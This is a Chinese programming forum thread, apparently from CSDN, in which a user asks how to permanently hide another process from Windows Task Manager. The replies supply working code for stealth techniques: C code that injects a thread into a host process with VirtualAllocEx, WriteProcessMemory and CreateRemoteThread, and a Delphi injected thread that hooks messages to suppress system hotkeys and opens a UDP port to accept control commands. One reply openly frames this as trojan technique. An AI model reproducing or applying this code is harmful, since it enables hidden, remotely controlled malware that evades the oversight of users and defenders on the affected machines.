这个问题很难呀.请高手多帮助.
我想用写一个程序,运行一次后,可以永远隐藏另一个进程,要让CTRL+ALT+DELETE的应用程序或者进程,
最好都看不到它.
在9X和NT上都要能实现.如果系统不一样,最好先判断系统,然后选择执行.我是一个新手.请高手一定说得具体,在此多谢了.在线等待中..........................................................................
我想用写一个程序,运行一次后,可以永远隐藏另一个进程,要让CTRL+ALT+DELETE的应用程序或者进程,
最好都看不到它.
在9X和NT上都要能实现.如果系统不一样,最好先判断系统,然后选择执行.我是一个新手.请高手一定说得具体,在此多谢了.在线等待中..........................................................................
procedure TForm1.FormCreate(Sender: TObject);
begin
showwindow(application.Handle,sw_hide);
setwindowlong(application.Handle,GWL_EXSTYLE,GETwindowLONG(application.Handle,GWL_exstyle) or WS_EX_TOOLWINDOW AND NOT WS_EX_APPWINDOW);
end;
关于进程的隐藏,98下的例子数不胜数。WinNT/Win2K下的隐藏方法,西祠的高手shotgun在去年的6月就已经在网上发布出实例《揭开木马的神秘面纱<四>》 ,我也多次拜读他的文章,对他的计算机水平及热心帮助朋友的作风十分敬佩。这里也可算是对shotgun的文章的补充与深入介绍吧,好了,闲话少说。
在WinNT下"真正隐藏进程"这一说法,可以讲是根本不可能实现,只要我们的程序是以进程内核的形式运行,都是不可能逃离CTRL+ALT+DEL的法眼。那么奇怪了,这岂不是与我们的标题《WinNT & Win2K下实现进程的完全隐藏》相矛盾吗?是的,实际上应该是:以非进程方式执行目标代码,而逃避进程查看器的检查,从而达到"进程隐藏"的目的。
我们这里用的,是在宿主进程中,以线程的方式执行我们的代码。实现起来非常简单。首先,我们先建立一个不执行任何语句的线程
DWORD stdcall ThreadProc(LPVOID *lpVoid){
return 0;
}
然后,将线程代码拷备至宿主进程所能够执行的任何地方(即页面属性为PAGGE_EXECUTE_READWRITE),如:共享内存影射区、宿主进程内。这里我们选择宿主进程,拷备的时侯,我们需要先在宿主进程中使用VirtualAllocEx函数申请一段内存,然后再使用WriteProcessMemory将线程体写入宿主进程中。
以上工作完成后,我们便可CreateRemoteThread函数激活其执行。下面给出一个完整的例子
//远程线程执行体
DWORD __stdcall ThreadProc (void *lpPara){
return 0;
}
int main(int argc, char* argv[]){
const DWORD THREADSIZE=1024*4;//暂定线程体大小为4K,实际上没这么大,稍后我将会介绍
DWORD byte_write;
//获得指定进程ID句柄,并设其权限为PROCESS_ALL_ACCESS,992是宿进程的ID号,获取ID号的方法这里我就不多讲了
HANDLE hWnd = ::OpenProcess (PROCESS_ALL_ACCESS,FALSE,992);
if(!hWnd)return 0;
void *pRemoteThread =::VirtualAllocEx(hWnd,0,THREADSIZE,MEM_COMMIT| MEM_RESERVE,PAGE_EXECUTE_READWRITE);//申请
if(!pRemoteThread)return 0;
if(!::WriteProcessMemory(hWnd,pRemoteThread,&ThreadProc,THREADSIZE,0))//写入进程
return 0;
//启动线程
HANDLE hThread = ::CreateRemoteThread (hWnd ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,NULL,0,&byte_write);
if(!hThread){ //还有内存分配未释放
return 0;
}
return 0;
}
到这里,对于隐藏的方法就算告一段落,相信看过的朋友对这个思路有个非常明确的概念了吧。 在理解隐藏的方法后,我们着重开始写线程的执行部分了。如下:
DWORD __stdcall ThreadProc(void *lpPara){
MessageBox(NULL,"hello","hello",0);
return 0;
}
编译执行后,你会发现出现一个非法操作错误,为什么呢?在我们以段页式内存管理的win2K操作系统中,编译时会把所有的常量编译在PE文件的.data节中,而代码段则在.text中,所以,我们拷备到宿主进程中的代码是在.text中的代码,MessageBox(NULL,(char *)指针,p,0);所指向的地址是本进程的内存虚拟地址。而在宿主进程中是无法访问的。解决的方法很简单,按旧照搬的将"hello"也拷备到目标进程中,然后再引用。同理,MessageBox函数地址编译时,也是保存在.Import中,写过Win2k病毒的朋友都知道,所有常量与函数入口地址都需在代码段定义与得出,我们这里也与他有点类似。言归正传,同样情况我们也把函数的入口地址一起写入目标进程中。//先定义参数结构
typedef struct _RemotePara{//参数结构
char pMessageBox[12];
DWORD dwMessageBox;
}RemotePara;
//付值
RemotePara myRemotePara;
::ZeroMemory(&myRemotePara,sizeof(RemotePara));
HINSTANCE hUser32 = ::LoadLibrary ("user32.dll");
myRemotePara.dwMessageBox =(DWORD) ::GetProcAddress (hUser32 , "MessageBoxA");
strcat(myRemotePara.pMessageBox,"hello\0");
//写进目标进程
RemotePara *pRemotePara =(RemotePara *) ::VirtualAllocEx (hWnd ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);//注意申请空间时的页面保护属性
if(!pRemotePara)return 0;
if(!::WriteProcessMemory (hWnd ,pRemotePara,&myRemotePara,sizeof myRemotePara,0))return 0;
//启动进将参数传递进入
HANDLE hThread = ::CreateRemoteThread (hWnd ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pRemotePara,0,&byte_write);
if(!hThread){
return 0;
}
我讲了N次就没人看怎么FAQ还没通过??!!看
http://community.csdn.net/Expert/topic/3336/3336604.xml?temp=8.689517E-02http://lysoft.7u7.net
拦截并修改热键消息,来禁止系统热键,线程注入后,开启UDP服务端口,可以接收外部控制命令,
以及退出命令(退出后自动释放代码区内存)全部用delphi编写,使用了少量的汇编代码,
不需要DLL,不生成额外文件,演示如何编写,
远程注入的线程代码
部分代码:
function RmtThreadProc(LParam: Integer): Integer; stdcall;
var
sin, adr: TSockAddrIn;
cp: PRmtData;
hd: THandle;
sk: TSocket;
et: THandle;
tid: Cardinal;
p2, p3: Pointer;
Msg: TMsg;
error: Integer;
t, m, len, adrlen: Integer;
buff: array[0..1024] of Char;
mbuf: array[0..20] of Char;
WSAData: TWSAData;
begin
Result := 0;
sk := 0;
et := 0;
tid := 0;
error := 0;
hd := 0;
if LParam <> 0 then
begin
cp := Pointer(LParam);
cp.PeekMessage(Msg, 0, WM_USER, WM_USER, PM_NOREMOVE);
p2 := PChar(@cp.sasclass[1]);
if StrLen(p2) = 0 then p2 := nil;
p3 := PChar(@cp.saswinm[1]);
if StrLen(p3) = 0 then p3 := nil;
if (p2 = nil) and (p3 = nil) then
error := 101
else
hd := cp.FindWindow(p2, p3);
if hd = 0 then error := 100;
if error = 0 then
begin
tid := cp.GetWindowThreadProcessId(hd);
if tid = 0 then error := 200;
end;
if error = 0 then
begin
cp.DestWnd := hd;
cp.DestThread := tid;
cp.HookHandle := cp.SetWindowsHookEx(WH_GETMESSAGE,
cp.GetMsgProcAddr, 0, tid);
if cp.HookHandle = 0 then error := 300;
end;
if error = 0 then
begin
if InitSock2Procs(cp) <> 1 then error := 400;
end;
cp.sockok := 0;
if error = 0 then
begin
if cp.WSAStartup($0202, WSAData) <> 0 then
begin
error := 402;
end;
end;
if error = 0 then
begin
cp.sockok := 1;
sk := cp.socket(PF_INET, SOCK_DGRAM, IPPROTO_IP);
if sk = INVALID_SOCKET then error := 4;
end;
if error = 0 then
begin
cp.UDPSocket := sk;
sin.sin_family := PF_INET;
sin.sin_addr.S_addr := INADDR_ANY;
sin.sin_port := cp.htons(cp.Port);
error := cp.bind(sk, sin, SizeOf(sin));
if error <> 0 then error := 500;
end;
if error = 0 then
begin
et := cp.WSACreateEvent;
if et = 0 then error := 600;
end;
if error = 0 then
begin
if cp.WSAEventSelect(sk, et, FD_READ) <> 0 then
error := 700;
end;
// loop detect
cp.TestState := 0;
while error = 0 do
begin
t := cp.MsgWaitForMultipleObjects(1, et, False,
8*1000, QS_ALLINPUT);
if t = WAIT_OBJECT_0 then
begin
cp.ResetEvent(et);
adrlen := SizeOf(adr);
len := cp.recvfrom(sk, buff, SizeOf(buff), 0, adr, adrlen);
if len > 0 then
begin
if adr.sin_addr.S_addr = $0100007f then
begin
// deal cmmds
m := DealCmmds(cp, buff, len);
if m < 0 then error := 10000;
len := CvtIntToStr(m, buff) + 1;
m := cp.sendto(sk, buff, len, 0, adr, SizeOf(adr));
if m <> len then error := 800;
end;
end;
end
else if t = WAIT_OBJECT_0 + 1 then
begin
if cp.PeekMessage(Msg, 0, 0, 0, PM_REMOVE) then
begin
cp.TestState := Msg.wParam;
end;
end;
end;
// Exit
if et <> 0 then cp.WSACloseEvent(et);
if (sk <> INVALID_SOCKET) and (sk <> 0) then
cp.closesocket(sk);
if cp.sockok <> 0 then
cp.WSACleanup;
FreeSock2Libs(cp);
if cp.IsThread <> 0 then
begin
if cp.SilentExit = 0 then
begin
StrCopy(@buff, PChar(@cp.Strs[2]));
CvtIntToStr(error, mbuf);
StrCat(@buff, @mbuf);
cp.MessageBox(0, PChar(@buff), PChar(@cp.Strs[1][1]),
MB_ICONINFORMATION or MB_OK);
end;
// call cp.VirtualFree(cp, 0, MEM_RELEASE);
// call cp.ExitThread(Result);
p2 := @cp.VirtualFree;
p3 := @cp.ExitThread;
asm
push Result
push 0 push MEM_RELEASE
push 0
push cp
push p3 push p2
ret
end;
end;
end
else
asm
call @@1
@@1:
pop eax
mov Result, eax
end;
end;function DummyBlockAddr: Integer; stdcall;
asm
call @@1
@@1:
pop eax;
ret
dd 0,0,0,0,0,0,0,0
dd 0,0,0,0,0,0,0,0
nop; nop; nop; nop;
end;function RmtHook(nCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
var
cp: PRmtData;
p: PMsg;
begin
// Get Data area address
// write before thread inject
cp := PPointer(DummyBlockAddr + 16)^;
p := Pointer(lParam);
Result := 0;
if Assigned(cp) and Assigned(p) then
begin
// determine TestState to Disable hotkey message
if (cp.TestState <> 0) then
begin
if p.message = WM_HOTKEY then
p.message := 0
else if (cp.Discard <> 0) and
(p.message = Cardinal(cp.Discard)) then
begin
p.message := WM_USER;
end;
end;
if cp.HookHandle <> 0 then
begin
Result := cp.CallNextHookEx(cp.HookHandle, nCode, wParam, lParam);
end;
end;
end;
>>>>>>>>>>>>>>>问题还没有解决<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>大家都是提的隐藏自己,但我要隐藏另一个PE<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>请高手多费心了<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
至于TSockAddrIn没有定义的问题。你引用Winsock就行了。
uses Winsock;